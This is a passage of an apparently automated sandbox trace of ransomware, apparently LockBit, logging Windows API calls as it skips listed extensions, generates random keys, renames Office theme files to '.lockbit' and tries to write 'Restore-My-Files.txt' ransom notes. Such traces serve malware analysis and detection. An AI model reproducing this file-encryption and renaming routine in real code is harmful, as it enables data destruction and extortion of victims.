(lpString1=".rtp", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.082] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Black Tie.xml") returned 1 [0192.084] lstrcmpiW (lpString1="ntldr", lpString2="Black Tie.xml") returned 1 [0192.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Black Tie.xml") returned 1 [0192.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="Black Tie.xml") returned 1 [0192.084] lstrcmpiW (lpString1="autorun.inf", lpString2="Black Tie.xml") returned -1 [0192.084] lstrcmpiW (lpString1="thumbs.db", lpString2="Black Tie.xml") returned 1 [0192.084] lstrcmpiW (lpString1="iconcache.db", lpString2="Black Tie.xml") returned 1 [0192.084] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.084] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml") returned=".xml" [0192.084] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.084] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.084] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.085] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.085] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.lockbit") returned 88 [0192.085] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0192.086] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.086] malloc (_Size=0x40068) returned 0x1ff1e60 [0192.086] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=927) returned 1 [0192.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0192.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0192.087] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.094] malloc (_Size=0xc6) returned 0x1fa2ed8 [0192.094] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0192.095] free (_Block=0x1fa2ed8) [0192.095] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.095] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.095] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.095] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedcdc100, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedcdc100, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Civic.xml", cAlternateFileName="")) returned 1 [0192.095] lstrcmpiW (lpString1=".", lpString2="Civic.xml") returned -1 [0192.095] lstrcmpiW (lpString1="..", lpString2="Civic.xml") returned -1 [0192.095] PathFindExtensionW (pszPath="Civic.xml") returned=".xml" [0192.095] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.095] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.096] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Civic.xml") returned 1 [0192.097] lstrcmpiW (lpString1="ntldr", lpString2="Civic.xml") returned 1 [0192.097] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Civic.xml") returned 1 [0192.097] lstrcmpiW (lpString1="bootsect.bak", lpString2="Civic.xml") returned -1 [0192.097] lstrcmpiW (lpString1="autorun.inf", lpString2="Civic.xml") returned -1 [0192.097] lstrcmpiW (lpString1="thumbs.db", lpString2="Civic.xml") returned 1 [0192.097] lstrcmpiW (lpString1="iconcache.db", lpString2="Civic.xml") returned 1 [0192.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml") returned=".xml" [0192.097] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.097] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.097] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.098] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.lockbit") returned 84 [0192.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0192.099] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.099] malloc (_Size=0x40068) returned 0x3df0008 [0192.099] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=960) returned 1 [0192.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0192.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0192.100] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.105] malloc (_Size=0xbe) returned 0x1fa2ed8 [0192.105] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0192.105] free (_Block=0x1fa2ed8) [0192.105] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0192.105] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0192.105] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0192.106] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342eb00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x342eb00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x39e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clarity.xml", cAlternateFileName="")) returned 1 [0192.106] lstrcmpiW (lpString1=".", lpString2="Clarity.xml") returned -1 [0192.106] lstrcmpiW (lpString1="..", lpString2="Clarity.xml") returned -1 [0192.106] PathFindExtensionW (pszPath="Clarity.xml") returned=".xml" [0192.106] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0192.106] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0192.107] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Clarity.xml") returned 1 [0192.107] lstrcmpiW (lpString1="ntldr", lpString2="Clarity.xml") returned 1 [0192.107] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Clarity.xml") returned 1 [0192.107] lstrcmpiW (lpString1="bootsect.bak", lpString2="Clarity.xml") returned -1 [0192.107] lstrcmpiW (lpString1="autorun.inf", lpString2="Clarity.xml") returned -1 [0192.107] lstrcmpiW (lpString1="thumbs.db", lpString2="Clarity.xml") returned 1 [0192.108] lstrcmpiW (lpString1="iconcache.db", lpString2="Clarity.xml") returned 1 [0192.108] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0192.108] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml") returned=".xml" [0192.108] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0192.108] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0192.108] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0192.109] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0192.109] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0192.109] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0192.109] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.lockbit") returned 86 [0192.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0192.110] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0192.110] malloc (_Size=0x40068) returned 0x1ff1e60 [0192.110] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=926) returned 1 [0192.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0192.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0192.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0192.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0192.111] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0192.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.lockbit", NtPathName=0x3d6b8e8, 